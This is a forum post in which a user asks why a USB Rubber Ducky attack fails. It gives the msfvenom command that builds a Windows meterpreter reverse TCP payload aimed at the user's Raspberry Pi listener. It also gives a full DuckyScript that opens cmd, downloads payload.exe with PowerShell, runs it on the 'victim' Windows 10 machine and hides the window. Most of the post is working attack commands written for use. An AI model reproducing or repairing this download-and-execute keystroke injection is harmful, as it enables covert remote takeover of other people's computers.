USB Rubber Ducky and Reverse TCP Payload

[hanshaze]

Hello....

i have a question about the USB Rubber Ducky...
Hope you can help me!

My attack computer is a Raspberry Pi 2 with Raspbian installed.
My victim PC is a Windows 10 Notebook.

I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim

if i plug in my USB Rubber Ducky into the Windows PC.

As i proceeded:

1. i created the “payload.exe” on the Raspberry Pi
~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe

2. i created a listener file and run it on the Raspberry Pi
~$ sudo nano /home/pi/listener.rc

To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator .
This is was happened on the Pi's screen:

so far so good.....

My idea now was to let the USB Rubber Ducky do two things for me after plug-in

1. download my “payload.exe” from the internet
2. install it on the victim-pc with admin rights

so i created a “inject.bin” with the Duck Toolkit Encoder.
This is the Code i used (changed the download URL to an existing)

DELAY 500
CONTROL ESCAPE
DELAY 200
STRING cmd.exe
DELAY 100
ENTER
DELAY 500
STRING cd %TEMP%
DELAY 100
ENTER
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe"
DELAY 100
ENTER
DELAY 100
ALT SPACE
DELAY 50
DOWN
DELAY 50
DOWN
DELAY 50
DOWN
DELAY 50
DOWN
DELAY 50
DOWN
DELAY 50
ENTER
DELAY 50
GUI d

Now, the code runs through without any errors, if i plug in the Rubber Ducky.
But the problem is that meterpreter gets no connection with the Ducky!

Why my DuckyScript doesnt execute the downloaded file?
I dont understand whats my fault!

Whats wrong? Please help me!

Greetings to Darren and the whole hak5-Team!